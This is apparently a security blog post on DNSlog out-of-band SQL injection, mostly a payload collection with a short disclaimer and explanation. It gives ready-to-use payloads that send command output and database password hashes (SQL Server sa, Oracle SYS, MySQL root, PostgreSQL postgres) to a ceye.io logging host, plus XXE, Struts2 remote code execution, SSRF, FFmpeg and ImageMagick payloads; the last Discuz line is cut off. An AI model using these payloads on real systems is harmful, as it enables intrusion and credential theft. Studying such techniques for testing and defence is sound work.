WEB Security: DNSlog SQL injection

Solemnly declare:
This note is only prepared for the purpose of improving safety knowledge and sharing safety knowledge with more people. Do not use the technology in the note for illegal activities. The consequences caused by using the technology in the note have nothing to do with the author himself. We advocate that everyone is responsible for maintaining network security and jointly safeguard network civilization and harmony.

1 Principle

  • DNSlog is the domain name resolution record stored on the DNS server. DNSlog records the access information of the browser to the domain name. DNSlog can read the resolution log of multi-level domain names and obtain information.
  • Initiate DNS query request with query statement, query the value through DNS request, combine it into three-level domain name, and display it in the DNS log of NS server.

2. Utilization scenario

  • When there is a SQL injection vulnerability in the WEB application, the page does not echo, and it is impossible to clearly confirm whether it is successfully utilized when reading files, executing command injection and other operations
  • Using blind injection dichotomy, Boolean blind injection and time blind injection, the injection efficiency is low and the thread is high, which is easy to be waf intercepted or even blocked;
  • At this time, DNSlog injection is used to bring out the requested content, and the desired result is obtained by querying DNSlog.

3 preconditions

  • Have a DNSlog server
  • The target host can access the Internet
  • The user has file read-write permission
  • You can use union queries
  • Know the absolute path of the file to read
    (1) Query user's file permissions

4 Platform

5 Payloads

payloads example in ceye website

Use of CEYE platform - more detailed examples)

0x00 command execution

i. *nix:

curl http://ip.port.b182oj.ceye.io/`whoami`
ping `whoami`.ip.port.b182oj.ceye.io

ii. windows

ping %USERNAME%.b182oj.ceye.io

0x01 SQL Injection

i. SQL Server

DECLARE @host varchar(1024);
SELECT @host=(SELECT TOP 1
master.dbo.fn_varbintohexstr(password_hash)
FROM sys.sql_logins WHERE name='sa')
+'.ip.port.b182oj.ceye.io';
EXEC('master..xp_dirtree
"\\'+@host+'\foobar$"');

Example:
# Query msql sa password
;DECLARE @host varchar(1024);SELECT @host=(SELECT TOP 1 password from admin)+'.YourIdentifier.ceye.io';EXEC('master..xp_dirtree"\\'+@host+'\foobar$"');

http://mssql.lab.com/index.aspx?id=1%3b%44%45%43%4c%41%52%45%20%40%68%6f%73%74%20%76%61%72%63%68%61%72%28%31%30%32%34%29%3b%53%45%4c%45%43%54%20%40%68%6f%73%74%3d%28%53%45%4c%45%43%54%20%54%4f%50%20%31%20%70%61%73%73%77%6f%72%64%20%66%72%6f%6d%20%61%64%6d%69%6e%29%2b%27%2e%36%68%63%6a%64%39%2e%63%65%79%65%2e%69%6f%27%3b%45%58%45%43%28%27%6d%61%73%74%65%72%2e%2e%78%70%5f%64%69%72%74%72%65%65%22%5c%5c%27%2b%40%68%6f%73%74%2b%27%5c%66%6f%6f%62%61%72%24%22%27%29%3b

ii. Oracle

SELECT UTL_INADDR.GET_HOST_ADDRESS('ip.port.b182oj.ceye.io');
SELECT UTL_HTTP.REQUEST('http://ip.port.b182oj.ceye.io/oracle') FROM DUAL;
SELECT HTTPURITYPE('http://ip.port.b182oj.ceye.io/oracle').GETCLOB() FROM DUAL;
SELECT DBMS_LDAP.INIT(('oracle.ip.port.b182oj.ceye.io',80) FROM DUAL;
SELECT DBMS_LDAP.INIT((SELECT password FROM SYS.USER$ WHERE name='SYS')||'.ip.port.b182oj.ceye.io',80) FROM DUAL;

iii. MySQL

  • MySQL version 5.7.6 introduces a new feature, secure_file_priv is used to restrict LOAD DATA, SELECT... Output, and load_ File() is transferred to the specified directory.
  • show variables like ‘%secure%’; View load_ Whether file() can read the disk.
  • secure_ file_ The value of priv parameter cannot be changed dynamically. It can only be modified in the Mysql configuration file. Restart takes effect.
    • NULL: by default, it means that Mysql is restricted and import and export are not allowed.
    • /Dir /: it means to restrict the import and export of Mysql. The export can only occur in the / dir / directory
    • Null value: indicates that the import and export of Mysql are not restricted
  • You can view this property through the command
    • select @@secure_file_priv
  • If Mysql + PHP architecture, PHP configuration file PHP The gpc parameter in ini also affects writing files:
    • gpc on: special characters will be escaped, such as: 'escape as \', and the input needs to be escaped at this time
SELECT LOAD_FILE(CONCAT('\\\\',(SELECT password FROM mysql.user WHERE user='root' LIMIT 1),'.mysql.ip.port.b182oj.ceye.io\\abc'));
Example:
# Query database version
http://mysql.lab.com/index.php?id=1 and (select load_file(concat('\\\\',(select version()),'.YourIdentifier.ceye.io\\abc')))

iv. PostgreSQL

DROP TABLE IF EXISTS table_output;
CREATE TABLE table_output(content text);
CREATE OR REPLACE FUNCTION temp_function()
RETURNS VOID AS $
DECLARE exec_cmd TEXT;
DECLARE query_result TEXT;
BEGIN
SELECT INTO query_result (SELECT passwd
FROM pg_shadow WHERE usename='postgres');
exec_cmd := E'COPY table_output(content)
FROM E\'\\\\\\\\'||query_result||E'.psql.ip.port.b182oj.ceye.io\\\\foobar.txt\'';
EXECUTE exec_cmd;
END;
$ LANGUAGE plpgsql SECURITY DEFINER;
SELECT temp_function();

0x02 XML Entity Injection

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ENTITY % remote SYSTEM "http://ip.port.b182oj.ceye.io/xxe_test">
%remote;]>
<root/>

0x03 Others

i. Struts2

xx.action?redirect:http://ip.port.b182oj.ceye.io/%25{3*4}
xx.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'whoami'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23t%3d%23d.readLine(),%23u%3d"http://ip.port.b182oj.ceye.io/result%3d".concat(%23t),%23http%3dnew%20java.net.URL(%23u).openConnection(),%23http.setRequestMethod("GET"),%23http.connect(),%23http.getInputStream()}

ii. FFMpeg

#EXTM3U#EXT-X-MEDIA-SEQUENCE:0#EXTINF:10.0,concat:http://ip.port.b182oj.ceye.io#EXT-X-ENDLIST

iii. Weblogic

 xxoo.com/uddiexplorer/SearchPublicRegistries.jsp?operator=http://ip.port.b182oj.ceye.io/test&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Businesslocation&btnSubmit=Search

iv. ImageMagick

push graphic-contextviewbox 0 0 640 480fill 'url(http://ip.port.b182oj.ceye.io)'pop graphic-context

v. Resin

xxoo.com/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=http://ip.port.b182oj.ceye.io/ssrf

vi. Discuz

http://xxx.xxxx.com/forum.php?mod=ajax&action=downremoteimg&message=[img=1,1]http:/

Keywords: Database security metasploit

Added by astaroth on Sat, 29 Jan 2022 07:18:40 +0200